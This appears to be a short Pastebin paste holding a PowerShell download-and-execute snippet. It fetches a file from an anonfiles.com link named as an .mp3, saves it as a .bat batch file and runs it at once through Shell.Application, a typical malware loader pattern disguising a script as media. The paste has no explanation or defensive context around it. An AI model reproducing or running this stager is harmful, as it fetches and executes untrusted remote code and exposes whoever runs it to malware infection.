KATARSIS0414

Untitled

Jan 24th, 2021
85
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.23 KB | None | 0 0
  1. $url_file = 'https://cdn-125.anonfiles.com/R1Z5mcCcp1/7ad2b712-1611478166/2.mp3'
  2. $file = '2.bat'
  3. PowerShell (New-Object System.net.WebClient).DownloadFile($url_file,$file),
  4. (New-Object -com Shell.Application).ShellExecute($file);
Add Comment
Please, Sign In to add comment